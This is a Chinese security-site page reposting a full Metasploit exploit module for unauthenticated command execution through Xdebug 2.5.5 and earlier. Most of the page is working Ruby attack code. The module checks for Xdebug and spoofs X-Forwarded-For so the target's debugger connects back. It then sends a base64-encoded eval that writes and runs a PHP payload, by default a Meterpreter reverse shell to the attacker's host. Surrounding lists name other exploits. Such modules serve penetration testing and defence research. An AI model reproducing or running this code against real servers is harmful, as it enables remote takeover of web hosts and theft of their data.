首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
xdebug < 2.5.5 - Unauthenticated OS Command Execution
来源:metasploit.com 作者:Mumbai 发布时间:2018-05-03  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Rex::Proto::Http
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'xdebug Unauthenticated OS Command Execution',
      'Description' => %q{
       Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
       This allows the attacker to execute arbitrary php code as the context of the web user.
      },
      'DisclosureDate' => 'Sep 17 2017',
      'Author' => [
        'Ricter Zheng', #Discovery https://twitter.com/RicterZ
        'Shaksham Jaiswal', # MinatoTW
        'Mumbai' # Austin Hudson
      ],
      'References' => [
        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
        ['URL', 'https://paper.seebug.org/397/']
      ],
      'License' => MSF_LICENSE,
      'Platform' => 'php',
      'Arch' => [ARCH_PHP],
      'DefaultTarget' => 0,
      'Stance' => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
      },
      'Payload' => {
        'DisableNops' => true,
      },
      'Targets' => [[ 'Automatic', {} ]],
    ))
 
    register_options([
        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
        OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
        Opt::RPORT(80),
        OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
    ])
  end
 
  def check
    begin
      res = send_request_cgi({
        'uri' => datastore["PATH"],
        'method' => 'GET',
          'vars_get' => {
          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
       }
      })
      vprint_status "Request sent\n#{res.headers}"
      if res && res.headers.to_s =~ /XDEBUG/i
        vprint_good("Looks like remote server has xdebug enabled\n")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
      rescue Rex::ConnectionError
        return CheckCode::Unknown
    end
  end
 
  def exploit
    payl = Rex::Text.encode_base64("#{payload.encoded}")
    file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
    webserver = Thread.new do
    begin
      server = Rex::Socket::TcpServer.create(
        'LocalPort' => datastore['SRVPORT'],
        'LocalHost' => datastore['SRVHOST'],
        'Context' => {
          'Msf' => framework,
          'MsfExploit' => self
      })
 
      client = server.accept
      print_status("Waiting for client response.")
      data = client.recv(1024)
      print_status("Receiving response")
      vprint_line(data)
      print_status("Shell might take upto a minute to respond.Please be patient.")
      print_status("Sending payload of size #{cmd1.length} bytes")
      register_file_for_cleanup(file)
      client.write(cmd1)
      client.close
      server.close
      webserver.exit
    ensure
      webserver.exit
    end
    end
    send_request_cgi({
        'uri' => datastore['PATH'],
        'method' => 'GET',
        'headers' => {
          'X-Forwarded-For' => "#{lhost}",
          'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
        }
    })
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WebKit - 'WebCore::jsElementSc
·Metasploit Framework - 'msfd'
·Easy MPEG to DVD Burner 1.7.11
·Metasploit Framework - 'msfd'
·LibreOffice/Open Office - '.od
·Exim < 4.90.1 - 'base64d' Remo
·Apple macOS/iOS - ReportCrash
·Schneider Electric InduSoft We
·Nagios XI 5.2.6 < 5.2.9 / 5.3
·Adobe Reader PDF - Client Side
·Navicat < 12.0.27 - Oracle Con
·GPON Routers - Authentication
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved